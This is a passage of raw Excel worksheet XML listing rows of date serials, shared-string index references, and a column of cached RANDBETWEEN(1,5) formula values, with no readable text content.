        <v>80</v>
      </c>
      <c r="E27910" t="s">
        <v>25403</v>
      </c>
      <c r="F27910">
        <f t="shared" ca="1" si="436"/>
        <v>3</v>
      </c>
    </row>
    <row r="27911" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27911" s="1">
        <v>42866.668483796297</v>
      </c>
      <c r="C27911" t="s">
        <v>10</v>
      </c>
      <c r="D27911" t="s">
        <v>163</v>
      </c>
      <c r="E27911" t="s">
        <v>25404</v>
      </c>
      <c r="F27911">
        <f t="shared" ca="1" si="436"/>
        <v>4</v>
      </c>
    </row>
    <row r="27912" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27912" s="1">
        <v>42866.661689814813</v>
      </c>
      <c r="C27912" t="s">
        <v>10</v>
      </c>
      <c r="D27912" t="s">
        <v>36</v>
      </c>
      <c r="E27912" t="s">
        <v>25405</v>
      </c>
      <c r="F27912">
        <f t="shared" ca="1" si="436"/>
        <v>1</v>
      </c>
    </row>
    <row r="27913" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27913" s="1">
        <v>42866.62122685185</v>
      </c>
      <c r="C27913" t="s">
        <v>10</v>
      </c>
      <c r="D27913" t="s">
        <v>89</v>
      </c>
      <c r="E27913" t="s">
        <v>25406</v>
      </c>
      <c r="F27913">
        <f t="shared" ca="1" si="436"/>
        <v>2</v>
      </c>
    </row>
    <row r="27914" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27914" s="1">
        <v>42866.605486111112</v>
      </c>
      <c r="C27914" t="s">
        <v>10</v>
      </c>
      <c r="D27914" t="s">
        <v>41</v>
      </c>
      <c r="E27914" t="s">
        <v>25407</v>
      </c>
      <c r="F27914">
        <f t="shared" ca="1" si="436"/>
        <v>5</v>
      </c>
    </row>
    <row r="27915" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A27915" s="1">
        <v>42866.546203703707</v>
      </c>
      <c r="C27915" t="s">
        <v>60</v>
      </c>
      <c r="E27915" s="2" t="s">
        <v>25408</v>
      </c>
      <c r="F27915">
        <f t="shared" ca="1" si="436"/>
        <v>5</v>
      </c>
    </row>
    <row r="27916" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A27916" s="1">
        <v>42866.520775462966</v>
      </c>
      <c r="C27916" t="s">
        <v>71</v>
      </c>
      <c r="E27916" s="2" t="s">
        <v>25409</v>
      </c>
      <c r="F27916">
        <f t="shared" ca="1" si="436"/>
        <v>4</v>
      </c>
    </row>
    <row r="27917" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27917" s="1">
        <v>42866.495509259257</v>
      </c>
      <c r="C27917" t="s">
        <v>10</v>
      </c>
      <c r="D27917" t="s">
        <v>6</v>
      </c>
      <c r="E27917" t="s">
        <v>25410</v>
      </c>
      <c r="F27917">
        <f t="shared" ca="1" si="436"/>
        <v>1</v>
      </c>
    </row>
    <row r="27918" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A27918" s="1">
        <v>42866.48510416667</v>
      </c>
      <c r="C27918" t="s">
        <v>471</v>
      </c>
      <c r="E27918" s="2" t="s">
        <v>25411</v>
      </c>
      <c r="F27918">
        <f t="shared" ca="1" si="436"/>
        <v>1</v>
      </c>
    </row>
    <row r="27919" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27919" s="1">
        <v>42866.478981481479</v>
      </c>
      <c r="C27919" t="s">
        <v>10</v>
      </c>
      <c r="D27919" t="s">
        <v>151</v>
      </c>
      <c r="E27919" t="s">
        <v>25412</v>
      </c>
      <c r="F27919">
        <f t="shared" ca="1" si="436"/>
        <v>3</v>
      </c>
    </row>
    <row r="27920" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A27920" s="1">
        <v>42866.457673611112</v>
      </c>
      <c r="C27920" t="s">
        <v>10</v>
      </c>
      <c r="D27920" t="s">
        <v>17</v>
      </c>
      <c r="E27920" s="2" t="s">
        <v>25413</v>
      </c>
      <c r="F27920">
        <f t="shared" ca="1" si="436"/>
        <v>5</v>
      </c>
    </row>
    <row r="27921" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27921" s="1">
        <v>42866.451018518521</v>
      </c>
      <c r="C27921" t="s">
        <v>10</v>
      </c>
      <c r="D27921" t="s">
        <v>229</v>
      </c>
      <c r="E27921" t="s">
        <v>25414</v>
      </c>
      <c r="F27921">
        <f t="shared" ca="1" si="436"/>
        <v>3</v>
      </c>
    </row>
    <row r="27922" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27922" s="1">
        <v>42866.448078703703</v>
      </c>
      <c r="C27922" t="s">
        <v>10</v>
      </c>
      <c r="D27922" t="s">
        <v>263</v>
      </c>
      <c r="E27922" t="s">
        <v>25415</v>
      </c>
      <c r="F27922">
        <f t="shared" ca="1" si="436"/>
        <v>3</v>
      </c>
    </row>
    <row r="27923" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A27923" s="1">
        <v>42866.423402777778</v>
      </c>
      <c r="C27923" t="s">
        <v>10</v>
      </c>
      <c r="D27923" t="s">
        <v>23</v>
      </c>
      <c r="E27923" s="2" t="s">
        <v>25416</v>
      </c>
      <c r="F27923">
        <f t="shared" ca="1" si="436"/>
        <v>4</v>
      </c>
    </row>
    <row r="27924" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A27924" s="1">
        <v>42866.417430555557</v>
      </c>
      <c r="C27924" t="s">
        <v>48</v>
      </c>
      <c r="E27924" s="2" t="s">
        <v>25417</v>
      </c>
      <c r="F27924">
        <f t="shared" ca="1" si="436"/>
        <v>1</v>
      </c>
    </row>
    <row r="27925" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27925" s="1">
        <v>42866.413055555553</v>
      </c>
      <c r="C27925" t="s">
        <v>10</v>
      </c>
      <c r="D27925" t="s">
        <v>20</v>
      </c>
      <c r="E27925" t="s">
        <v>25418</v>
      </c>
      <c r="F27925">
        <f t="shared" ca="1" si="436"/>
        <v>4</v>
      </c>
    </row>
    <row r="27926" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27926" s="1">
        <v>42866.318564814814</v>
      </c>
      <c r="C27926" t="s">
        <v>471</v>
      </c>
      <c r="E27926" t="s">
        <v>25419</v>
      </c>
      <c r="F27926">
        <f t="shared" ca="1" si="436"/>
        <v>2</v>
      </c>
    </row>
    <row r="27927" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27927" s="1">
        <v>42866.292407407411</v>
      </c>
      <c r="C27927" t="s">
        <v>41</v>
      </c>
      <c r="E27927" t="s">
        <v>25420</v>
      </c>
      <c r="F27927">
        <f t="shared" ca="1" si="436"/>
        <v>2</v>
      </c>
    </row>
    <row r="27928" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27928" s="1">
        <v>42866.270833333336</v>
      </c>
      <c r="C27928" t="s">
        <v>60</v>
      </c>
      <c r="E27928" t="s">
        <v>25421</v>
      </c>
      <c r="F27928">
        <f t="shared" ca="1" si="436"/>
        <v>2</v>
      </c>
    </row>
    <row r="27929" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27929" s="1">
        <v>42866.236990740741</v>
      </c>
      <c r="C27929" t="s">
        <v>471</v>
      </c>
      <c r="E27929" t="s">
        <v>25422</v>
      </c>
      <c r="F27929">
        <f t="shared" ca="1" si="436"/>
        <v>2</v>
      </c>
    </row>
    <row r="27930" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27930" s="1">
        <v>42866.226319444446</v>
      </c>
      <c r="C27930" t="s">
        <v>48</v>
      </c>
      <c r="E27930" t="s">
        <v>25423</v>
      </c>
      <c r="F27930">
        <f t="shared" ca="1" si="436"/>
        <v>5</v>
      </c>
    </row>
    <row r="27931" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27931" s="1">
        <v>42866.222604166665</v>
      </c>
      <c r="C27931" t="s">
        <v>454</v>
      </c>
      <c r="E27931" t="s">
        <v>25424</v>
      </c>
      <c r="F27931">
        <f t="shared" ca="1" si="436"/>
        <v>1</v>
      </c>
    </row>
    <row r="27932" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A27932" s="1">
        <v>42866.185150462959</v>
      </c>
      <c r="C27932" t="s">
        <v>253</v>
      </c>
      <c r="E27932" s="2" t="s">
        <v>25425</v>
      </c>
      <c r="F27932">
        <f t="shared" ca="1" si="436"/>
        <v>3</v>
      </c>
    </row>
    <row r="27933" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A27933" s="1">
        <v>42866.17732638889</v>
      </c>
      <c r="C27933" t="s">
        <v>139</v>
      </c>
      <c r="E27933" s="2" t="s">
        <v>25426</v>
      </c>
      <c r="F27933">
        <f t="shared" ca="1" si="436"/>
        <v>5</v>
      </c>
    </row>
    <row r="27934" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A27934" s="1">
        <v>42866.177291666667</v>
      </c>
      <c r="C27934" t="s">
        <v>41</v>
      </c>
      <c r="E27934" s="2" t="s">
        <v>25427</v>
      </c>
      <c r="F27934">
        <f t="shared" ca="1" si="436"/>
        <v>2</v>
      </c>
    </row>
    <row r="27935" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A27935" s="1">
        <v>42866.174699074072</v>
      </c>
      <c r="C27935" t="s">
        <v>41</v>
      </c>
      <c r="E27935" s="2" t="s">
        <v>25428</v>
      </c>
      <c r="F27935">
        <f t="shared" ca="1" si="436"/>
        <v>5</v>
      </c>
    </row>
    <row r="27936" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A27936" s="1">
        <v>42866.15116898148</v>
      </c>
      <c r="C27936" t="s">
        <v>41</v>
      </c>
      <c r="E27936" s="2" t="s">
        <v>25429</v>
      </c>
      <c r="F27936">
        <f t="shared" ca="1" si="436"/>
        <v>2</v>
      </c>
    </row>
    <row r="27937" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27937" s="1">
        <v>42866.137939814813</v>
      </c>
      <c r="C27937" t="s">
        <v>477</v>
      </c>
      <c r="E27937" t="s">
        <v>25430</v>
      </c>
      <c r="F27937">
        <f t="shared" ca="1" si="436"/>
        <v>1</v>
      </c>
    </row>
    <row r="27938" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27938" s="1">
        <v>42866.123831018522</v>
      </c>
      <c r="C27938" t="s">
        <v>60</v>
      </c>
      <c r="E27938" t="s">
        <v>25431</v>
      </c>
      <c r="F27938">
        <f t="shared" ca="1" si="436"/>
        <v>5</v>
      </c>
    </row>
    <row r="27939" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A27939" s="1">
        <v>42866.119131944448</v>
      </c>
      <c r="C27939" t="s">
        <v>71</v>
      </c>
      <c r="E27939" s="2" t="s">
        <v>25432</v>
      </c>
      <c r="F27939">
        <f t="shared" ca="1" si="436"/>
        <v>5</v>
      </c>
    </row>
    <row r="27940" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27940" s="1">
        <v>42866.105231481481</v>
      </c>
      <c r="C27940" t="s">
        <v>73</v>
      </c>
      <c r="E27940" t="s">
        <v>25433</v>
      </c>
      <c r="F27940">
        <f t="shared" ca="1" si="436"/>
        <v>2</v>
      </c>
    </row>
    <row r="27941" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A27941" s="1">
        <v>42866.098402777781</v>
      </c>
      <c r="C27941" t="s">
        <v>318</v>
      </c>
      <c r="E27941" s="2" t="s">
        <v>25434</v>
      </c>
      <c r="F27941">
        <f t="shared" ca="1" si="436"/>
        <v>1</v>
      </c>
    </row>
    <row r="27942" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A27942" s="1">
        <v>42866.091562499998</v>
      </c>
      <c r="C27942" t="s">
        <v>559</v>
      </c>
      <c r="E27942" s="2" t="s">
        <v>25435</v>
      </c>
      <c r="F27942">
        <f t="shared" ca="1" si="436"/>
        <v>5</v>
      </c>
    </row>
    <row r="27943" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27943" s="1">
        <v>42866.000231481485</v>
      </c>
      <c r="C27943" t="s">
        <v>73</v>
      </c>
      <c r="E27943" t="s">
        <v>25436</v>
      </c>
      <c r="F27943">
        <f t="shared" ca="1" si="436"/>
        <v>4</v>
      </c>
    </row>
    <row r="27944" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27944" s="1">
        <v>42865.909872685188</v>
      </c>
      <c r="C27944" t="s">
        <v>10</v>
      </c>
      <c r="D27944" t="s">
        <v>229</v>
      </c>
      <c r="E27944" t="s">
        <v>25437</v>
      </c>
      <c r="F27944">
        <f t="shared" ca="1" si="436"/>
        <v>1</v>
      </c>
    </row>
    <row r="27945" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A27945" s="1">
        <v>42865.772118055553</v>
      </c>
      <c r="C27945" t="s">
        <v>6</v>
      </c>
      <c r="D27945" t="s">
        <v>821</v>
      </c>
      <c r="E27945" s="2" t="s">
        <v>25438</v>
      </c>
      <c r="F27945">
        <f t="shared" ca="1" si="436"/>
        <v>4</v>
      </c>
    </row>
    <row r="27946" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A27946" s="1">
        <v>42865.717905092592</v>
      </c>
      <c r="C27946" t="s">
        <v>107</v>
      </c>
      <c r="E27946" s="2" t="s">
        <v>25439</v>
      </c>
      <c r="F27946">
        <f t="shared" ca="1" si="436"/>
        <v>2</v>
      </c>
    </row>
    <row r="27947" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27947" s="1">
        <v>42865.666493055556</v>
      </c>
      <c r="C27947" t="s">
        <v>10</v>
      </c>
      <c r="D27947" t="s">
        <v>6</v>
      </c>
      <c r="E27947" t="s">
        <v>25440</v>
      </c>
      <c r="F27947">
        <f t="shared" ca="1" si="436"/>
        <v>5</v>
      </c>
    </row>
    <row r="27948" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27948" s="1">
        <v>42865.654861111114</v>
      </c>
      <c r="C27948" t="s">
        <v>10</v>
      </c>
      <c r="D27948" t="s">
        <v>6</v>
      </c>
      <c r="E27948" t="s">
        <v>25441</v>
      </c>
      <c r="F27948">
        <f t="shared" ca="1" si="436"/>
        <v>5</v>
      </c>
    </row>
    <row r="27949" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27949" s="1">
        <v>42865.65047453704</v>
      </c>
      <c r="C27949" t="s">
        <v>10</v>
      </c>
      <c r="D27949" t="s">
        <v>23</v>
      </c>
      <c r="E27949" t="s">
        <v>25442</v>
      </c>
      <c r="F27949">
        <f t="shared" ca="1" si="436"/>
        <v>2</v>
      </c>
    </row>
    <row r="27950" spans="1:6" ht="300" x14ac:dyDescent="0.25">
      <c r="A27950" s="1">
        <v>42865.634120370371</v>
      </c>
      <c r="C27950" t="s">
        <v>6</v>
      </c>
      <c r="D27950" t="s">
        <v>25</v>
      </c>
      <c r="E27950" s="2" t="s">
        <v>25443</v>
      </c>
      <c r="F27950">
        <f t="shared" ca="1" si="436"/>
        <v>1</v>
      </c>
    </row>
    <row r="27951" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A27951" s="1">
        <v>42865.622083333335</v>
      </c>
      <c r="C27951" t="s">
        <v>10</v>
      </c>
      <c r="D27951" t="s">
        <v>36</v>
      </c>
      <c r="E27951" s="2" t="s">
        <v>25444</v>
      </c>
      <c r="F27951">
        <f t="shared" ca="1" si="436"/>
        <v>3</v>
      </c>
    </row>
    <row r="27952" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27952" s="1">
        <v>42865.62164351852</v>
      </c>
      <c r="C27952" t="s">
        <v>10</v>
      </c>
      <c r="D27952" t="s">
        <v>52</v>
      </c>
      <c r="E27952" t="s">
        <v>25445</v>
      </c>
      <c r="F27952">
        <f t="shared" ca="1" si="436"/>
        <v>4</v>
      </c>
    </row>
    <row r="27953" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A27953" s="1">
        <v>42865.561851851853</v>
      </c>
      <c r="C27953" t="s">
        <v>6</v>
      </c>
      <c r="D27953" t="s">
        <v>25</v>
      </c>
      <c r="E27953" s="2" t="s">
        <v>25446</v>
      </c>
      <c r="F27953">
        <f t="shared" ca="1" si="436"/>
        <v>2</v>
      </c>
    </row>
    <row r="27954" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A27954" s="1">
        <v>42865.560231481482</v>
      </c>
      <c r="C27954" t="s">
        <v>229</v>
      </c>
      <c r="E27954" s="2" t="s">
        <v>25447</v>
      </c>
      <c r="F27954">
        <f t="shared" ca="1" si="436"/>
        <v>2</v>
      </c>
    </row>
    <row r="27955" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A27955" s="1">
        <v>42865.519189814811</v>
      </c>
      <c r="C27955" t="s">
        <v>65</v>
      </c>
      <c r="E27955" s="2" t="s">
        <v>25448</v>
      </c>
      <c r="F27955">
        <f t="shared" ca="1" si="436"/>
        <v>3</v>
      </c>
    </row>
    <row r="27956" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27956" s="1">
        <v>42865.497175925928</v>
      </c>
      <c r="C27956" t="s">
        <v>10</v>
      </c>
      <c r="D27956" t="s">
        <v>80</v>
      </c>
      <c r="E27956" t="s">
        <v>25449</v>
      </c>
      <c r="F27956">
        <f t="shared" ca="1" si="436"/>
        <v>2</v>
      </c>
    </row>
    <row r="27957" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A27957" s="1">
        <v>42865.481759259259</v>
      </c>
      <c r="C27957" t="s">
        <v>10</v>
      </c>
      <c r="D27957" t="s">
        <v>112</v>
      </c>
      <c r="E27957" s="2" t="s">
        <v>25450</v>
      </c>
      <c r="F27957">
        <f t="shared" ca="1" si="436"/>
        <v>2</v>
      </c>
    </row>
    <row r="27958" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A27958" s="1">
        <v>42865.481678240743</v>
      </c>
      <c r="C27958" t="s">
        <v>10</v>
      </c>
      <c r="D27958" t="s">
        <v>36</v>
      </c>
      <c r="E27958" s="2" t="s">
        <v>25451</v>
      </c>
      <c r="F27958">
        <f t="shared" ca="1" si="436"/>
        <v>3</v>
      </c>
    </row>
    <row r="27959" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27959" s="1">
        <v>42865.45107638889</v>
      </c>
      <c r="C27959" t="s">
        <v>10</v>
      </c>
      <c r="D27959" t="s">
        <v>20</v>
      </c>
      <c r="E27959" t="s">
        <v>25452</v>
      </c>
      <c r="F27959">
        <f t="shared" ca="1" si="436"/>
        <v>4</v>
      </c>
    </row>
    <row r="27960" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27960" s="1">
        <v>42865.438206018516</v>
      </c>
      <c r="C27960" t="s">
        <v>103</v>
      </c>
      <c r="E27960" t="s">
        <v>25453</v>
      </c>
      <c r="F27960">
        <f t="shared" ca="1" si="436"/>
        <v>4</v>
      </c>
    </row>
    <row r="27961" spans="1:6" ht="375" x14ac:dyDescent="0.25">
      <c r="A27961" s="1">
        <v>42865.425347222219</v>
      </c>
      <c r="C27961" t="s">
        <v>48</v>
      </c>
      <c r="E27961" s="2" t="s">
        <v>25454</v>
      </c>
      <c r="F27961">
        <f t="shared" ca="1" si="436"/>
        <v>1</v>
      </c>
    </row>
    <row r="27962" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27962" s="1">
        <v>42865.413055555553</v>
      </c>
      <c r="C27962" t="s">
        <v>50</v>
      </c>
      <c r="E27962" t="s">
        <v>25455</v>
      </c>
      <c r="F27962">
        <f t="shared" ca="1" si="436"/>
        <v>3</v>
      </c>
    </row>
    <row r="27963" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A27963" s="1">
        <v>42865.372499999998</v>
      </c>
      <c r="C27963" t="s">
        <v>71</v>
      </c>
      <c r="E27963" s="2" t="s">
        <v>25456</v>
      </c>
      <c r="F27963">
        <f t="shared" ca="1" si="436"/>
        <v>4</v>
      </c>
    </row>
    <row r="27964" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27964" s="1">
        <v>42865.369606481479</v>
      </c>
      <c r="C27964" t="s">
        <v>41</v>
      </c>
      <c r="F27964">
        <f t="shared" ca="1" si="436"/>
        <v>3</v>
      </c>
    </row>
    <row r="27965" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A27965" s="1">
        <v>42865.355879629627</v>
      </c>
      <c r="C27965" t="s">
        <v>43</v>
      </c>
      <c r="E27965" s="2" t="s">
        <v>25457</v>
      </c>
      <c r="F27965">
        <f t="shared" ca="1" si="436"/>
        <v>3</v>
      </c>
    </row>
    <row r="27966" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A27966" s="1">
        <v>42865.341967592591</v>
      </c>
      <c r="C27966" t="s">
        <v>124</v>
      </c>
      <c r="E27966" s="2" t="s">
        <v>25458</v>
      </c>
      <c r="F27966">
        <f t="shared" ca="1" si="436"/>
        <v>2</v>
      </c>
    </row>
    <row r="27967" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27967" s="1">
        <v>42865.33394675926</v>
      </c>
      <c r="C27967" t="s">
        <v>41</v>
      </c>
      <c r="E27967" t="s">
        <v>25459</v>
      </c>
      <c r="F27967">
        <f t="shared" ca="1" si="436"/>
        <v>4</v>
      </c>
    </row>
    <row r="27968" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27968" s="1">
        <v>42865.331122685187</v>
      </c>
      <c r="C27968" t="s">
        <v>10</v>
      </c>
      <c r="D27968" t="s">
        <v>6</v>
      </c>
      <c r="E27968" t="s">
        <v>25460</v>
      </c>
      <c r="F27968">
        <f t="shared" ca="1" si="436"/>
        <v>3</v>
      </c>
    </row>
    <row r="27969" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A27969" s="1">
        <v>42865.327002314814</v>
      </c>
      <c r="C27969" t="s">
        <v>41</v>
      </c>
      <c r="E27969" s="2" t="s">
        <v>25461</v>
      </c>
      <c r="F27969">
        <f t="shared" ca="1" si="436"/>
        <v>1</v>
      </c>
    </row>
    <row r="27970" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27970" s="1">
        <v>42865.31527777778</v>
      </c>
      <c r="C27970" t="s">
        <v>189</v>
      </c>
      <c r="E27970" t="s">
        <v>25462</v>
      </c>
      <c r="F27970">
        <f t="shared" ref="F27970:F28033" ca="1" si="437">RANDBETWEEN(1,5)</f>
        <v>4</v>
      </c>
    </row>
    <row r="27971" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A27971" s="1">
        <v>42865.30773148148</v>
      </c>
      <c r="C27971" t="s">
        <v>10</v>
      </c>
      <c r="D27971" t="s">
        <v>52</v>
      </c>
      <c r="E27971" s="2" t="s">
        <v>25463</v>
      </c>
      <c r="F27971">
        <f t="shared" ca="1" si="437"/>
        <v>2</v>
      </c>
    </row>
    <row r="27972" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A27972" s="1">
        <v>42865.286874999998</v>
      </c>
      <c r="C27972" t="s">
        <v>48</v>
      </c>
      <c r="E27972" s="2" t="s">
        <v>25464</v>
      </c>
      <c r="F27972">
        <f t="shared" ca="1" si="437"/>
        <v>3</v>
      </c>
    </row>
    <row r="27973" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27973" s="1">
        <v>42865.212245370371</v>
      </c>
      <c r="C27973" t="s">
        <v>559</v>
      </c>
      <c r="E27973" t="s">
        <v>25465</v>
      </c>
      <c r="F27973">
        <f t="shared" ca="1" si="437"/>
        <v>3</v>
      </c>
    </row>
    <row r="27974" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A27974" s="1">
        <v>42865.208611111113</v>
      </c>
      <c r="C27974" t="s">
        <v>559</v>
      </c>
      <c r="E27974" s="2" t="s">
        <v>25466</v>
      </c>
      <c r="F27974">
        <f t="shared" ca="1" si="437"/>
        <v>2</v>
      </c>
    </row>
    <row r="27975" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A27975" s="1">
        <v>42865.182314814818</v>
      </c>
      <c r="C27975" t="s">
        <v>430</v>
      </c>
      <c r="E27975" s="2" t="s">
        <v>25467</v>
      </c>
      <c r="F27975">
        <f t="shared" ca="1" si="437"/>
        <v>1</v>
      </c>
    </row>
    <row r="27976" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27976" s="1">
        <v>42865.182314814818</v>
      </c>
      <c r="C27976" t="s">
        <v>41</v>
      </c>
      <c r="E27976" t="s">
        <v>25468</v>
      </c>
      <c r="F27976">
        <f t="shared" ca="1" si="437"/>
        <v>3</v>
      </c>
    </row>
    <row r="27977" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A27977" s="1">
        <v>42865.133912037039</v>
      </c>
      <c r="C27977" t="s">
        <v>43</v>
      </c>
      <c r="E27977" s="2" t="s">
        <v>25469</v>
      </c>
      <c r="F27977">
        <f t="shared" ca="1" si="437"/>
        <v>5</v>
      </c>
    </row>
    <row r="27978" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27978" s="1">
        <v>42865.085324074076</v>
      </c>
      <c r="C27978" t="s">
        <v>124</v>
      </c>
      <c r="E27978" t="s">
        <v>25470</v>
      </c>
      <c r="F27978">
        <f t="shared" ca="1" si="437"/>
        <v>3</v>
      </c>
    </row>
    <row r="27979" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A27979" s="1">
        <v>42865.080625000002</v>
      </c>
      <c r="C27979" t="s">
        <v>10</v>
      </c>
      <c r="D27979" t="s">
        <v>6</v>
      </c>
      <c r="E27979" s="2" t="s">
        <v>25471</v>
      </c>
      <c r="F27979">
        <f t="shared" ca="1" si="437"/>
        <v>4</v>
      </c>
    </row>
    <row r="27980" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27980" s="1">
        <v>42865.064085648148</v>
      </c>
      <c r="C27980" t="s">
        <v>140</v>
      </c>
      <c r="D27980" t="s">
        <v>750</v>
      </c>
      <c r="E27980" t="s">
        <v>25472</v>
      </c>
      <c r="F27980">
        <f t="shared" ca="1" si="437"/>
        <v>1</v>
      </c>
    </row>
    <row r="27981" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27981" s="1">
        <v>42864.788217592592</v>
      </c>
      <c r="C27981" t="s">
        <v>140</v>
      </c>
      <c r="D27981" t="s">
        <v>141</v>
      </c>
      <c r="E27981" t="s">
        <v>25473</v>
      </c>
      <c r="F27981">
        <f t="shared" ca="1" si="437"/>
        <v>4</v>
      </c>
    </row>
    <row r="27982" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A27982" s="1">
        <v>42864.724120370367</v>
      </c>
      <c r="C27982" t="s">
        <v>10</v>
      </c>
      <c r="D27982" t="s">
        <v>6</v>
      </c>
      <c r="E27982" s="2" t="s">
        <v>25474</v>
      </c>
      <c r="F27982">
        <f t="shared" ca="1" si="437"/>
        <v>5</v>
      </c>
    </row>
    <row r="27983" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A27983" s="1">
        <v>42864.723703703705</v>
      </c>
      <c r="C27983" t="s">
        <v>2210</v>
      </c>
      <c r="E27983" s="2" t="s">
        <v>25475</v>
      </c>
      <c r="F27983">
        <f t="shared" ca="1" si="437"/>
        <v>4</v>
      </c>
    </row>
    <row r="27984" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A27984" s="1">
        <v>42864.713321759256</v>
      </c>
      <c r="C27984" t="s">
        <v>10</v>
      </c>
      <c r="D27984" t="s">
        <v>80</v>
      </c>
      <c r="E27984" s="2" t="s">
        <v>25476</v>
      </c>
      <c r="F27984">
        <f t="shared" ca="1" si="437"/>
        <v>3</v>
      </c>
    </row>
    <row r="27985" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A27985" s="1">
        <v>42864.706319444442</v>
      </c>
      <c r="C27985" t="s">
        <v>10</v>
      </c>
      <c r="D27985" t="s">
        <v>178</v>
      </c>
      <c r="E27985" s="2" t="s">
        <v>25477</v>
      </c>
      <c r="F27985">
        <f t="shared" ca="1" si="437"/>
        <v>1</v>
      </c>
    </row>
    <row r="27986" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27986" s="1">
        <v>42864.679050925923</v>
      </c>
      <c r="C27986" t="s">
        <v>10</v>
      </c>
      <c r="D27986" t="s">
        <v>94</v>
      </c>
      <c r="E27986" t="s">
        <v>25478</v>
      </c>
      <c r="F27986">
        <f t="shared" ca="1" si="437"/>
        <v>1</v>
      </c>
    </row>
    <row r="27987" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A27987" s="1">
        <v>42864.655752314815</v>
      </c>
      <c r="C27987" t="s">
        <v>10</v>
      </c>
      <c r="D27987" t="s">
        <v>36</v>
      </c>
      <c r="E27987" s="2" t="s">
        <v>25479</v>
      </c>
      <c r="F27987">
        <f t="shared" ca="1" si="437"/>
        <v>5</v>
      </c>
    </row>
    <row r="27988" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27988" s="1">
        <v>42864.621759259258</v>
      </c>
      <c r="C27988" t="s">
        <v>10</v>
      </c>
      <c r="D27988" t="s">
        <v>192</v>
      </c>
      <c r="E27988" t="s">
        <v>25480</v>
      </c>
      <c r="F27988">
        <f t="shared" ca="1" si="437"/>
        <v>5</v>
      </c>
    </row>
    <row r="27989" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27989" s="1">
        <v>42864.615081018521</v>
      </c>
      <c r="C27989" t="s">
        <v>10</v>
      </c>
      <c r="D27989" t="s">
        <v>36</v>
      </c>
      <c r="E27989" t="s">
        <v>25481</v>
      </c>
      <c r="F27989">
        <f t="shared" ca="1" si="437"/>
        <v>1</v>
      </c>
    </row>
    <row r="27990" spans="1:6" x14ac:dyDescent="0.25">
